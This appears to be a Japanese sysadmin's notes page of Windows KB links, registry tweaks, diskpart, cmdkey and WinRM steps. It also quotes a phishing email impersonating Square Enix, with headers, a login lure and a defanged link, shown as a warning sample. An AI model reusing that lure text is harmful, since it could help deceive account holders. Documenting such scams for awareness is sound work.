IE10 インストールに失敗する、Windows 7 用 Internet Explorer 10 の必須更新プログラムを入手する方法 http://support.microsoft.com/kb/2818833/ja Windows 7 SP1 または Windows Server 2008 R2 SP1 を実行しているコンピュータをログオフまたは再起動した後、 Internet Explorer 10 では web サイト用の資格情報が保存されない。 http://support.microsoft.com/kb/2786081/ja Windows 7 SP1 および Windows Server 2008 R2 SP1 用プラットフォーム更新プログラムが利用可能です。 http://support.microsoft.com/kb/2670838 Windows 8 の Adobe Flash Player 用のコンテンツを含む Web サイトに関する開発者向けガイダンス (Internet Explorer) http://msdn.microsoft.com/ja-jp/library/ie/jj193557(v=vs.85).aspx
Windows のサービス概要およびネットワーク ポート要件 http://support.microsoft.com/kb/832017/ja 既定の動的ポートの範囲 XP 1025 〜 5000 VISTA 以降 49152 〜 65535
共有系のトラブル "MoveSecurityAttributes"のレジストリのエントリが Windows 7 では、Windows Vista では、Windows Server 2008 または Windows Server 2008 R2 では機能しません。 http://support.microsoft.com/kb/2617058 Windows エクスプ ローラーが、ネットワーク探索状態で Windows 7 または Windows Server 2008 R2 に設定されるとランダムにクラッシュします。 http://support.microsoft.com/kb/2494427 アプリケーションまたは Winsock API または Winsock カーネル API を使用してサービスが Windows Server 2008 R2 または Windows 7 が応答を停止してランダムに http://support.microsoft.com/kb/2465772 Windows Vista、Windows Server 2008 または Windows 7 を実行しているコンピューター上のリモート共有フォルダーから、Excel 2007 ドキュメントを開こうとすると「ファイルが使用中」メッセージ http://support.microsoft.com/kb/942146 ネットワーク共有上のファイルにアクセスしようとすると、エクスプ ローラー Windows 7、Windows Server 2008 R2、Windows Vista または Windows Server 2008 を実行しているコンピューターで応答が停止します。 http://support.microsoft.com/kb/2550581 Windows 7 または Windows Server 2008 R2 で、共有のファイルにアクセスすると、プールのメモリ リークが発生ページ http://support.microsoft.com/kb/2612966 Windows 7 または Windows Server 2008 R2 がアプリケーションをネットワーク共有に多数の I/O 操作を実行すると応答を停止します。 http://support.microsoft.com/kb/2582112 NTFS ボリュームに Windows 7 または Windows Server 2008 R2 でのディレクトリの循環参照が含まれている場合は、アプリケーションがフリーズしました。 http://support.microsoft.com/kb/2782476 アクセス ベースの列挙を有効に Windows 7 または Windows Server 2008 R2 のファイル共有にアクセスしようとすると「アクセスが拒否されました」のエラー メッセージ http://support.microsoft.com/kb/2821343 アクセス許可のない子オブジェクトを含むフォルダーのセキュリティ設定変更時に「アクセスが拒否されました」エラーメッセージが表示される http://support.microsoft.com/kb/975702 Windows 7 または Windows Server 2008 R2 で、Robocopy コマンドを使用すると大幅にディレクトリ ツリーのレプリケーション パフォーマンス低下 http://support.microsoft.com/kb/2646535 Windows 7 または Windows Server 2008 R2 ベースのクライアントが Oplock break 要求が無視されます。 http://support.microsoft.com/kb/2824408 アプリケーションの読み取りまたはファイルは、Windows Server 2008 R2、Windows Server 2008、Windows 7 または Windows Vista で正常にアクセスはいません。 http://support.microsoft.com/kb/2698155 Windows 7 または Windows Server 2008 R2 を実行しているコンピューターは、ネットワーク共有から Microsoft Office 2003年ドキュメントを開くまであと 4 分 http://support.microsoft.com/kb/982860 Windows Server 2008 R2 のパフォーマンス チューニングに関するガイドライン | マイクロソフト 技術情報 http://technet.microsoft.com/ja-jp/windowsserver/ff657837.aspx Windows Server 2008 R2 のパフォーマンス チューニング http://msdn.microsoft.com/ja-jp/library/windows/hardware/gg463392.aspx Windows ファイルサーバー関連のチューニングポイント一覧 - 仮想化でプリセールスしてるSEの一日 http://d.hatena.ne.jp/ogawad/20130710/1373415676 Windows TIPS:NTFSとReFSの違い - @IT http://www.atmarkit.co.jp/ait/articles/1307/19/news107.html Windows の次世代ファイル システム: ReFS - Building Windows 8 - Site Home - MSDN Blogs http://blogs.msdn.com/b/b8_ja/archive/2012/01/20/windows-refs.aspx How to use the File Server Capacity Tool (FSCT) on Server 2012 R2 - Ask Premier Field Engineering (PFE) Platforms - Site Home - TechNet Blogs http://blogs.technet.com/b/askpfeplat/archive/2014/04/28/how-to-use-the-file-server-capacity-tool-fsct-on-server-2012-r2.aspx ※SMB3.0 の暗号化を有効にした場合、対応していないマシン(Windows Server 2012 と Windows 8 以外)は接続を拒否されるので注意。
ABE の機能を有効にするフォルダーの最大レベルを指定   キー: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters   値の名前 : ABELevel   データ型 : REG_DWORD   値 : 0(キーがない場合の既定の動作)         値 0 =: すべてのサブフォルダが対象         値 = 1: 1 (\server\share) の深さまで有効         値 = 2: 2 (\server\share\folder) の深さまで有効   ABE が有効になっていると Windows Vista、Windows 7、Windows Server 2008 または Windows Server 2008 R2 を実行しているファイル サーバー上の高い CPU 使用率   http://support.microsoft.com/kb/2732618/ja
メモリ管理 Windows 7 / Windows Server 2008 R2 環境でのDynamic Cache Service 利用について http://blogs.technet.com/b/askcorejp/archive/2013/03/28/windows-7-windows-server-2008-r2-dynamic-cache-service.aspx Rammapツールでメモリの詳細な利用状況を調査する − @IT http://www.atmarkit.co.jp/fwin2k/win2ktips/1358rammap/rammap.html Windows 7 | リソース モニターで簡単リソース監視 | TechNet http://technet.microsoft.com/ja-jp/windows/ee350564.aspx リソース・モニタでメモリの利用状況をモニタする − @IT http://www.atmarkit.co.jp/fwin2k/win2ktips/1356resmonp/resmonp.html Windows の管理 : サーバーのパフォーマンスを測定する http://technet.microsoft.com/ja-jp/magazine/2008.08.pulse.aspx Tasklist http://technet.microsoft.com/ja-jp/library/cc730909(v=ws.10).aspx Windows ベースのコンピューターでメモリが不足している場合に、データが破損する http://support.microsoft.com/kb/2785146
Windows 2008 R2 および Windows 7 で「検索プログラムおよびファイル」ボックスから検索結果が正しく表示されない。 http://support.microsoft.com/kb/977380/ja 修正パッチを適用するか、以下レジストリを削除。 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FolderTypes\ {ef87b4cb-f2ce-4785-8658-4ca6c63e38c6}
2008 のドメイン環境に 2012 を足すと WinRM 3.0 サービスがインストールされ,実行されていること,および必要なファイアウォールポートが開いていることを確認してください。 と言ったようなメッセージが。 この場合は、 2008 に .NET Framework 4.0 をインストールして、Windows RM 3.0 をインストール その後、ほかからの接続を許可するため、PowerSell で Enable-PSRemoting を実行する。
google がどこにもリンクしてない非公開サイトに、またアクセスしてきている。 検索エンジンに間違えて URL を入力した場合、数日以内に確実に探りが入りますね・・・ 2014/07/30 10:43:39 401 GET 66.249.80.23 http://www.google.com/search 2014/07/30 13:20:36 401 GET 66.249.80.23 http://www.google.com/search
フリーのアンチウイルスソフトのダウンロードにメールアドレスが必要で入力後 1週間程度たつと、大量のウイルス付メールがやってくる・・・
【重要】フィッシング詐欺サイトへ誘導するメールやメッセージにご注意ください | SQUARE ENIX http://www.jp.square-enix.com/info/1308_attention.html 来たよ。 中国からのフィッシングメール(ヘッダ情報の一部と URL のクエリは削除) Received: from cwbiv.org (unverified [42.121.113.151]) by mail.netdive.jp Subject:=?utf-8?B?5bi456K66KqN44Gu44GK6aGY44GE4oCP?= Date: Mon, 4 Aug 2014 16:34:52 +0800 MIME-Version: 1.0 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2900.5512 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.5512 Title 常確認のお願い Body いつもお世話になっております。 お客様のアカウントは何らかの取引に利用されている恐れがありますので、お手数ですが、システムにログインして、異常がないかご確認いただきますようお願いします。 : ttp://secure.square-enix.com/account/app/svc/Login.htm? 株式会社スクウェア·エニックス 2014年8月4日
Windows 7 の高速化 Windows 7 または Windows Server 2008 R2 を実行しているコンピューターにアプリケーションをインストールした後のすべてのサービスの前に長い遅延が準備ができて
削除できないプリンター アイコンが出現する問題について http://blogs.technet.com/b/askcorejp/archive/2014/08/07/3635610.aspx   ユーザーのログオフ時にプリンターのキャッシュ情報を削除   キー: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Providers\Client Side Rendering Print Provider   値の名前 : RemovePrintersAtLogoff   データ型 : REG_DWORD   値 : 1
エラーレポートの無効化 WER Settings (Windows) Windows Error Reporting Part.1 | re-Think things ・・・は動作を停止しました、を表示させないようにするには ForceQueue に 1 をセット。   キー: HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting   キー: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting   値の名前 : ForceQueue   データ型 : REG_DWORD   値 : 1
資格情報マネージャーの無効化   キー: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa   値の名前 : disabledomaincreds   データ型 : REG_DWORD   値 : 1         0 = 資格情報がキャッシュに保存されることを許可 (初期値)         1 = 資格情報がキャッシュに保存されないようにする   設定後、コンピューターを再起動。 資源情報を表示するコマンドは cmdkey RAS 資格情報を削除するコマンドは cmdkey /delete /ras DirectAccess などのリモート アクセス接続におけるドメイン リソースへのアクセス障害
リモート管理 サーバー マネージャーでのリモート管理の構成 リモート UAC LocalAccountTokenFilterPolicy レジストリ設定は、Windows Vista のイメージを変更する方法 Windowsスマートチューニング (42) XP/Vista編: UACが有効な状態で管理共有を有効にする | マイナビニュース Windowsスマートチューニング (134) Win 7編: 不特定多数のPC利用に備えユーザーアカウント制御(UAC)を強化する | マイナビニュース [WinRM:初級編] WinRM を構成してみよう! - 管理者は見た!〜AD と ILM 一家の秘密〜 - Site Home - TechNet Blogs (他の)PCにログオンしているユーザーを調べる。 query.exe session ( /server:targetPC ) ファイル システムの拡張に失敗しエクスプローラーから容量が増えていない場合 管理者権限でコマンド プロンプトから diskpart を起動。 ボリュームのリストを確認 DISKPART> list volume ボリュームを選択します。( X には確認したボリューム番号を指定 ) DISKPART> select volume X ファイル システムを拡張。 DISKPART> extend filesystem diskpart を終了。 DISKPART> exit Windows7 から Windows10 へ 1.XP MODE は事前に削除しておくこと   ・10 にした時に Hyper-V が正常に動かなかった。 2.タスクスケジューラを利用している場合は削除しておく。   ・10 にした時に タスクスケジューラの整合性が取れなくなって GUI から削除できなくなった。 インストール後の問題 1.手動のみによる Windows Update が出来ない。(突然再起動しているので作業している場合に問題) 2.Hyper-V動作時でネットワークフォルダを表示時に HOST マシンのマウスが稀に正しく動作しない。(負荷がかかりすぎた状態に突然なる) 3.動作しなくなるアプリがある。 ・タスクスケジューラの修復   キー: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache   値の名前 : Tree   値の名前 : Tasks   値の名前 : Boot / Logon / Plain (タスクの実行のタイミングで異なる)   データ型 : REG_SZ   "次回実行時刻" が空白となり、次回実行時刻となっても、タスクが実行されない問題について (Windows Server 2008 / Windows Vista) - Ask CORE - Site Home - TechNet Blogs   http://blogs.technet.com/b/askcorejp/archive/2014/05/16/quot-quot-windows-server-2008.aspx